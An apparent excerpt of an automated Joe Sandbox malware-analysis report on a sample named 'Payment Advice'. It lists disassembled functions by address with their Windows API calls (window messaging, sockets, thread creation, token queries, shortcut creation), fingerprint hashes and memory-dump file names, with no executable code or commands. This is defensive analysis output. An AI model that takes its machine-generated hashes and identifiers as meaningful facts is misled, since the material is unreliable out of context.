Opcode ID: c4b821c50653e82a8c9a4750d525548fa94631edd73e7cd0e8e14d8da51f4c61
Instruction ID: f1192da1172093110d89bbb0218481d493c6d026787b8adfb629b4fff32c7308
Opcode Fuzzy Hash: c4b821c50653e82a8c9a4750d525548fa94631edd73e7cd0e8e14d8da51f4c61
Instruction Fuzzy Hash: 2F318971900219EBEF04CFA8D94DADE7FB6FB04319F104629F921AA1D1C7F0A954CB91

Function 005BDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 005BDBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 005BDBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 005BDC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 005BDC52
_wcsstr.LIBCMT ref: 005BDC5C

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: c20d7c1463b6cd83cbbcddfe720464dbfa7087e839088c58468f33a983f45c68
Instruction ID: 535dbd787466e1c707c749d9d3c7bbc1b5accfb37b72a962dce1dd5e4be40311
Opcode Fuzzy Hash: c20d7c1463b6cd83cbbcddfe720464dbfa7087e839088c58468f33a983f45c68
Instruction Fuzzy Hash: B821C571204105BBEB155B799C49EBF7FA9FF85760F108139F809CA191EAA1EC4197B0

Function 005BBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005BBC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005BBCC2
__itow.LIBCMT ref: 005BBCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005BBD00
__itow.LIBCMT ref: 005BBD11

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 5bed551e4495d579a021a6a069f67b9dee40c3c38bb13d71cbd71d3f779c4ddb
Instruction ID: b892902ce240369c9b9ffe2ba3d91f7a48392d68cc382c5cd7fe50b4c0221131
Opcode Fuzzy Hash: 5bed551e4495d579a021a6a069f67b9dee40c3c38bb13d71cbd71d3f779c4ddb
Instruction Fuzzy Hash: 2B21F635600209BFEB20AA648C4AFDF7E69BF89310F001424FA05EB181EBE0AD0587A1

Function 005C6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 005850E6: _wcsncpy.LIBCMT ref: 005850FA

GetFileAttributesW.KERNEL32(?,?,?,?,005C60C3), ref: 005C6369
GetLastError.KERNEL32(?,?,?,005C60C3), ref: 005C6374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,005C60C3), ref: 005C6388
_wcsrchr.LIBCMT ref: 005C63AA

Part of subcall function 005C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,005C60C3), ref: 005C63E0

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: ad03e2ef65e74e48b3267a50edd46298f5361cf93ca3555200d79e0a0176588b
Instruction ID: e832c4f893f5ce3910668ed8d6e96435c0adef556ab387c6469666fd5830fef6
Opcode Fuzzy Hash: ad03e2ef65e74e48b3267a50edd46298f5361cf93ca3555200d79e0a0176588b
Instruction Fuzzy Hash: 4B2108315042568FDF15ABF8AC56FEE2B6CBF06BA0F10086DF045D30C1EB60DB808A65

Function 005D8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 005DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 005DA84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 005D8BD3
WSAGetLastError.WSOCK32(00000000), ref: 005D8BE2
connect.WSOCK32(00000000,?,00000010), ref: 005D8BFE

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: c4f1cd07db9e6f46f0f05b5ab7c19f0bfb412435b97b2825584a4713a992bda5
Instruction ID: 7e5324744c82a1477c27b77ca4eb83b67e5e54ec06e8359564eb0806b95019a4
Opcode Fuzzy Hash: c4f1cd07db9e6f46f0f05b5ab7c19f0bfb412435b97b2825584a4713a992bda5
Instruction Fuzzy Hash: 1F218131240115AFDB10AF68CC49F7E7BA9FF88710F04455AF916AB391DB74EC018B51

Function 005D8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 005D8441
GetForegroundWindow.USER32 ref: 005D8458
GetDC.USER32(00000000), ref: 005D8494
GetPixel.GDI32(00000000,?,00000003), ref: 005D84A0
ReleaseDC.USER32(00000000,00000003), ref: 005D84DB

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 243450d64fedc3a94f77d433fe1a260ea67b4287f35a5d84ee9e8d158a758b62
Instruction ID: 47187dac133902350c84be63cb33a762adca6c7739cddefa9ed6647841a644ec
Opcode Fuzzy Hash: 243450d64fedc3a94f77d433fe1a260ea67b4287f35a5d84ee9e8d158a758b62
Instruction Fuzzy Hash: 99218475A00205AFDB10EFA4D889A6EBBF5FF88301F048479E85A97351DB70AC04CB60

Function 0059AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0059AFE3
SelectObject.GDI32(?,00000000), ref: 0059AFF2
BeginPath.GDI32(?), ref: 0059B009
SelectObject.GDI32(?,00000000), ref: 0059B033

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 5ad246de804662836ce8eb16ff164c46a9d8f58a6984985dd84d8bc689e7854a
Instruction ID: b0adbc348ae05b5ae46ea6314b6dff3e64344bb4d4de6a5049a9e8b9fe1f998e
Opcode Fuzzy Hash: 5ad246de804662836ce8eb16ff164c46a9d8f58a6984985dd84d8bc689e7854a
Instruction Fuzzy Hash: 6F21B0B8800309EFEF10DF95ED487AA7F6AFB12355F15531AE5259A0A0D3B09991CF90

Function 005A217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 005A21A9
CreateThread.KERNEL32(?,?,005A22DF,00000000,?,?), ref: 005A21ED
GetLastError.KERNEL32 ref: 005A21F7
_free.LIBCMT ref: 005A2200
__dosmaperr.LIBCMT ref: 005A220B

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: f3687faf71f750fec0a8f0a5456d085e1265aa86925d53805b99731e0a12035d
Instruction ID: 9eef87cf5fa5188f4eb6b19737f69257c6371d66d388fa03d39b3b89c9a702d5
Opcode Fuzzy Hash: f3687faf71f750fec0a8f0a5456d085e1265aa86925d53805b99731e0a12035d
Instruction Fuzzy Hash: 5311083210470B6FDB11AFA9DC46E5F3F99FF47770F100529F91486141EB31C80186A0

Function 005BABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 005BABD7
GetLastError.KERNEL32(?,005BA69F,?,?,?), ref: 005BABE1
GetProcessHeap.KERNEL32(00000008,?,?,005BA69F,?,?,?), ref: 005BABF0
HeapAlloc.KERNEL32(00000000,?,005BA69F,?,?,?), ref: 005BABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 005BAC0E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 45a6ac2b8bc4d2ecb0be69b722e53204b1f1a2fa9b798d0ba6a5905855f3bc62
Instruction ID: e09885d72ce4cb934abd9b970703542c32fdb53175d554a81d94c4d8f707736f
Opcode Fuzzy Hash: 45a6ac2b8bc4d2ecb0be69b722e53204b1f1a2fa9b798d0ba6a5905855f3bc62
Instruction Fuzzy Hash: D1011971250204BFDB144FA9DC48DAB7FAEFF8A755B200569F945C3260DA719C80CB61

Function 005C7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 005C7A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 005C7A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005C7A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 005C7A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 005C7AD0

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: c97960176bca0293ec19a53b42d34044614fb001a9cba9b151379e055c7efd01
Instruction ID: 2135badb02dcaa4c9d436d476b583b8663b5efa2ff9fd19cfef5a076918f9565
Opcode Fuzzy Hash: c97960176bca0293ec19a53b42d34044614fb001a9cba9b151379e055c7efd01
Instruction Fuzzy Hash: 4B011375C0862DEFCF00AFE5DC48AEEBB79FB1C711F040599E502B2650DB3496548BA5

Function 005B9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 005B9ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 005B9AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 005B9B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 005B9B15
CLSIDFromString.OLE32(?,?), ref: 005B9B21

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 87c1de68b161e192c47a691846bc792abd7369e104ba951fa6015b48c5910497
Instruction ID: b191785d83b1bef424c75a9d05e7bcda7dbff2c9ac88e68b74ce494cbe34e357
Opcode Fuzzy Hash: 87c1de68b161e192c47a691846bc792abd7369e104ba951fa6015b48c5910497
Instruction Fuzzy Hash: D4014F7A610219BFDB114F94ED44BAABEEEFF44751F148024FA05D2210D770ED409BA0

Function 005BAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005BAA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005BAA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005BAA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005BAA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005BAAAF

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b1dc10f9cfa2e4cefedc2b335c0afad7d70c72b961a1bfc09b7cfed7e18c7d2d
Instruction ID: 35a83863ff5ced8527021a9d5b43b4ec253de2e4d9aaacbc6a777af0b478af24
Opcode Fuzzy Hash: b1dc10f9cfa2e4cefedc2b335c0afad7d70c72b961a1bfc09b7cfed7e18c7d2d
Instruction Fuzzy Hash: C5F04975280204BFEB115FE4AC89EAB3FADFF4A754F400529F945C71A0DA60AC41CA71

Function 005BAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005BAADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005BAAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005BAAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005BAAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005BAB10

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 60fe5d8970f3dd57567bf80ea6703b7d5ba4bc418558d51c2cf2152a584191b9
Instruction ID: ad78d783c87240c02727c9dd4249db142ae36cc6c51e23b0f7daf3372373b36c
Opcode Fuzzy Hash: 60fe5d8970f3dd57567bf80ea6703b7d5ba4bc418558d51c2cf2152a584191b9
Instruction Fuzzy Hash: 6DF062752502087FEB110FE4EC88EAB3B6EFF46754F100129F956C7190CA60AC41CB61

Function 005BEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 005BEC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 005BECAB
MessageBeep.USER32(00000000), ref: 005BECC3
KillTimer.USER32(?,0000040A), ref: 005BECDF
EndDialog.USER32(?,00000001), ref: 005BECF9

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: ae68e03d8ffa2c2306022819f762dce87ee7149b16b4b73194cf98fe148a2945
Instruction ID: 4c97ab48edf73f49de981ab1c71a71110635538022cd731e8e1ec6580caabad0
Opcode Fuzzy Hash: ae68e03d8ffa2c2306022819f762dce87ee7149b16b4b73194cf98fe148a2945
Instruction Fuzzy Hash: B5016D30580705ABEB255B50DE4EBD77FB9BB00705F041659A982A14E0DBF0BE888B80

Function 0059B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0059B0BA
StrokeAndFillPath.GDI32(?,?,005FE680,00000000,?,?,?), ref: 0059B0D6
SelectObject.GDI32(?,00000000), ref: 0059B0E9
DeleteObject.GDI32 ref: 0059B0FC
StrokePath.GDI32(?), ref: 0059B117

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: d3797c9354f6371f9a285d9fde0f7ec7705cf4685d786df15588ad0d161c76f1
Instruction ID: 5a49cd951a88c34a3ed452a40ccfdea82522fcff8f72e9f6e0e6f9bc0cdaeba3
Opcode Fuzzy Hash: d3797c9354f6371f9a285d9fde0f7ec7705cf4685d786df15588ad0d161c76f1
Instruction Fuzzy Hash: 81F0C938044344EFEB219FA5EE0D7553F66B713366F19A315E429490F0C7318AA5DF54

Function 005CF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 005CF2DA
CoCreateInstance.OLE32(0060DA7C,00000000,00000001,0060D8EC,?), ref: 005CF2F2
CoUninitialize.OLE32 ref: 005CF555

Strings

.lnk, xrefs: 005CF28B, 005CF290, 005CF29E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: da45bc8de42fc9ea58c05d3236d81bb3162460c0fde440d3e0645c861d7a8367
Instruction ID: 2068cc02ad2c21459ae6a10f9247cf0617d8876abbe7407dbcd6011a07093c84
Opcode Fuzzy Hash: da45bc8de42fc9ea58c05d3236d81bb3162460c0fde440d3e0645c861d7a8367
Instruction Fuzzy Hash: 18A10971104202AFD700EFA4C885EABBBA9FFD8714F40491DF55597192EB70EA49CB62

Function 005CE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0058660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005853B1,?,?,005861FF,?,00000000,00000001,00000000), ref: 0058662F

CoInitialize.OLE32(00000000), ref: 005CE85D
CoCreateInstance.OLE32(0060DA7C,00000000,00000001,0060D8EC,?), ref: 005CE876
CoUninitialize.OLE32 ref: 005CE893

Part of subcall function 0058936C: __swprintf.LIBCMT ref: 005893AB
Part of subcall function 0058936C: __itow.LIBCMT ref: 005893DF

Strings

.lnk, xrefs: 005CE83B, 005CE84D

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 800b70a756be0b2099b9c82fb93c457137d4e433756d1b7c3ff908114866bc0c
Instruction ID: 7d1313931c26c73721db10dd1b08b4817d4f6a5c12c50166e23528d07b50e605
Opcode Fuzzy Hash: 800b70a756be0b2099b9c82fb93c457137d4e433756d1b7c3ff908114866bc0c
Instruction Fuzzy Hash: BEA134356043029FCB14EF54C889E2ABBE5BF89710F14895CF996AB3A1CB31ED45CB91

Function 005A325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 005A32ED

Part of subcall function 005AE0D0: __87except.LIBCMT ref: 005AE10B

Strings

pow, xrefs: 005A32C5, 005A32E2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 3ea1278bcfa1b94f2abe94557eadaf4fbd6c9effdbd6829e26fd9d58a57bcbb3
Instruction ID: 960ac7e54ddde29ff84da27801172ff92cab867e62970d88fe9c72473bb0cf51
Opcode Fuzzy Hash: 3ea1278bcfa1b94f2abe94557eadaf4fbd6c9effdbd6829e26fd9d58a57bcbb3
